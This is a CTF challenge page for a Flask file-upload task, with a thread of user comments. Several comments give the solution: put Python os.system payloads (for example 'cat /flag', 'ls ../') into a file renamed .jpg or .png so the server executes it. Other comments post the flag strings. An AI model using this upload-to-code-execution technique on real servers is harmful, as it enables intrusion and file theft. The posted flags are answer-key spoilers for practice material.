Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
⎝Lazzaro⎠
一血奖励:
3金币
解 决:
11821
提 示:
描 述:
Flask_FileUpload
评论
zhaiwb 2年前
举报
这种题怎么答,我是小白。有入口吗??
wxhctf 1年前
举报
@主旋律世界 怎么用命令找呢
Cmy520CTF 1年前
举报
@Rookzzh import os os.system('ls ../') os.system('cat ../flag')
Rookzzh 1年前
举报
@Cmy520CTF 代码是啥?
主旋律世界 1年前
举报
我也是小白,这个路径不可能一眼看出来,可以拿命令找一下,发现在环境变量里面才是用cat /flag
Cmy520CTF 2年前
举报
创建一个文本,将代码放进去,改成JPG或者PNG格式,上传文件即可获取flag
Cmy520CTF 2年前
举报
import os os.system('ls ../') os.system('cat ../flag')
孤独的XK 2年前
举报
flag{5d468b7fbaa83c2a858fbbd4a1241e24}
孤独的XK 2年前
举报
flag{5d468b7fbaa83c2a858fbbd4a1241e24}
孤独的XK 2年前
举报
flag{5d468b7fbaa83c2a858fbbd4a1241e24}
2802867984 2年前
举报
!-- File "/app/upload/1111.jpg", line 1 Python 3.9.7 (tags/v3.9.7:1016ef3, Aug 30 2021, 20:19:38) [MSC v.1929 64 bit (AMD64)] on win32 ^ SyntaxError: invalid syntax --&
1019697179 2年前
举报
import os os.system('cat /flag')//导入OS才能使用system,cat是查询命令
15091760453 2年前
举报
flag{1c6b553c3a91791993b859e1625275ac}
Cat00011cat 2年前
举报
import os os.system('ls / -l') os.system('cat /flag')
nf1y 2年前
举报
为啥我返回包出现的是这样 File "/app/upload/test.jpg", line 1 SyntaxError: Non-UTF-8 code starting with '\xff' in file /app/upload/test.jpg on line 1, but no encoding declared; see http://python.org/de
不知名学渣 2年前
举报
@aWxvdmVjdGY 我是小白,请问大佬,我很好奇为什么传图片就会以代码形式执行,那么这个实现是类似apache的解析漏洞吗?
aWxvdmVjdGY 2年前
举报
1、<input type="file" name="file" accept=".jpg,.png">这里限制了格式,后端也会检查。需要将py文件后缀为png,然后上传会议python文件执行
白猫a 2年前
举报
这个作者可以哇,题目解的真精彩!!!